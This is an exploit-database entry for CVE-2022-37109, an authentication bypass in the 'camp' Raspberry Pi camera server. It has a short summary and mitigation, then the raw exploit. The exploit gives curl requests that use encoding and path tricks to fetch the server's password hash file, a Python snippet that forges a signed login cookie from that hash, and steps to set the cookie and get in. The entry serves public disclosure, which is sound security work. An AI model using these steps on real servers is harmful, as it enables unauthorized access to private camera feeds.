camp Raspberry Pi camera server Authentication Bypass

vendor:

camp

by:

Elias Hohl

9.8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: camp

Affected Version From: bf6af5c2e5cf713e4050c11c52dd4c55e89880b1

Affected Version To: bf6af5c2e5cf713e4050c11c52dd4c55e89880b1

Patch Exists: YES

Related CWE: CVE-2022-37109

CPE: a:patrickfuller:camp

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 20.04

2022

camp Raspberry Pi camera server Authentication Bypass

A vulnerability in the camp Raspberry Pi camera server allows an attacker to bypass authentication by sending a crafted cookie. This can be done by fetching the SHA-512 password hash using one of the methods mentioned in the exploit and then executing a python snippet to generate a cookie value. This cookie value can then be used to bypass authentication.

Mitigation:

Ensure that the server is running the latest version of the camp Raspberry Pi camera server and that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: "camp" Raspberry Pi camera server 1.0 -  Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109

"camp" Raspberry Pi camera server Authentication Bypass vulnerability

https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904

1. Start an instance of the "camp" server:
python3 server.py --require-login

2. Fetch the SHA-512 password hash using one of these methods:

curl http://localhost:8000/static/password.tx%74

OR

curl http://localhost:8000/static/./password.txt --path-as-is

OR

curl http://localhost:8000/static/../camp/password.txt --path-as-is

3. Execute the following python snippet (replace the hash with the hash you received in step 2).

from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))

4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.